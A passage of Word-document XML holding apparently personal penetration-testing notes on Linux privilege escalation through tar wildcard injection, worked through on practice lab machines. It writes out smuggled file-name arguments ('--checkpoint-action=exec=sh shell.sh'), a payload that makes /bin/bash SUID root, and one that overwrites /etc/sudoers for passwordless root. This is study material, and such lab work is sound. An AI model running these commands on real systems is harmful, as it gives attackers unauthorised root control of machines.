      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" but I think it's standard file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002592">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1200"/>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524500" cy="889000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="194" name="image188.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image188.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId795"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="55245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2593">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="120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*/2 * * * * root cd /opt/admin &amp;&amp; tar -zxf /tmp/backup.tar.gz *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002594">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you can pass in '</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">*/2 * * * *</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' to</w:t>
      </w:r>
      <w:hyperlink r:id="rId796">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId797">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://crontab.guru/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or you can guess based on the file name that this executes every two minutes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002595">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And we see that it's running as root, which is important for priv esc!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002596">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And now, we can do the bash gobbling attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002597">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First, we have to go to the directory where it's running the tar command, which as we see in the file, is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002598">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1200"/>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cd /opt/admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002599">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And then we have to create a malicious file. I first tried to create a .elf rev shell, but the cron job wouldn't execute it or maybe a firewall blocked it. So to be safer, I should change the permissions of /bin/bash and make it SUID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000259A">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First, find the path to chmod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000259B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1200"/>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which chmod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000259C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="120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echo "/usr/bin/chmod 4755 /bin/bash" &gt; shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000259D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1200"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That command itself sets the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> bit (4) and normal rwxr-xr-x (755) permissions on /bin/bash.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000259E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1200"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4755</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → owner can read/write/execute, group/others can read/execute, and the file runs with the owner’s (root’s) privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000259F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1200"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So /bin/bash would become a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> root binary, meaning any user who runs /bin/bash gets a root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A0">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So once we get shell.sh to execute, we can run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/bash -p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A1">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To do this attack, while inside of /opt/admin, we can create these two files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1200"/>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touch ./--checkpoint=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1200"/>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touch './--checkpoint-action=exec=sh shell.sh'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1200"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, we can check back in two minutes to see if /bin/bash has SUID bit set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1200"/>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ls -lah /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1200"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we see SUID bit set!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1200"/>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-rwsr-xr-x 1 root root 1.4M Jan  6  2022 /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1200"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we login as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="120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-p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025AC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t84wh2izqbgg" w:id="328"/>
      <w:bookmarkEnd w:id="328"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example2 of Bash gobbling or Linux tar wildcard (with SUDO) (/usr/bin/tar)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId798">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Cockpit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1498600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="350" name="image339.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image339.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId799"/>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25B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This time, it was actually sudo. This can be exploited as explained in the writeup:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1342"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">At target machine, create 2 files (make sure you run tar in the same directory)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1342"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "" &gt; '--checkpoint=1'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1342"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "" &gt; '--checkpoint-action=exec=sh payload.sh'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1342"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then create a payload.sh with below content, you can create on your kali machine and transfer to target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1342"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'james ALL=(root) NOPASSWD: ALL' &gt; /etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1342"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">james</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with your username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1342"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x payload.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1342"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute the tar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1342"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/tar -czvf /tmp/backup.tar.gz *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025BC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_alkusyqm6v4t" w:id="329"/>
      <w:bookmarkEnd w:id="329"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example3 of Bash gobbling or Linux tar wildcard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025BE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As seen in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play Amaterasu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5003800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="162" name="image153.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image153.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId800"/>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25C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is known as Bash Gobbling or Linux tar wildcard (globbing). This also teaches us about Bash Scripting. Here is an explanation:</w:t>
